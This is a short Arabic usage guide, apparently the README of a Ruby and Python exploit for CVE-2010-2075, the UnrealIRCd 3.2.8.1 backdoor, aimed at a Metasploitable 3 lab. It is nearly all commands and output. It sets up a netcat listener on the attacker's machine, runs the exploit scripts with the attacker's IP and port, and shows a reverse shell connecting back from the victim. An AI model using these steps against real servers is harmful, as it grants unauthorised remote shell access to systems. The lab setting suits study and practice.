
استغلال Ruby و Python لـ CVE-2010-2075 يستهدف UnrealIRCd 3.2.8.1، مما يوفر وصولاً عن بُعد بقشرة عكسية على Metasploitable 3.
على شيل المهاجم
nc -nlvp 1111
على شيل الضحية
ruby exploit.rb 127.0.0.1
المخرجات المتوقعة على شيل المهاجم
listening on [any] 1111 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 48144
boba_fett
على شيل الضحية
python3 exploit.py -ri 127.0.0.1 -rp 6697 -cmd <command> -li <attacker_ip> -lp <attacker_port>
على شيل المهاجم
nc -nlvp 1111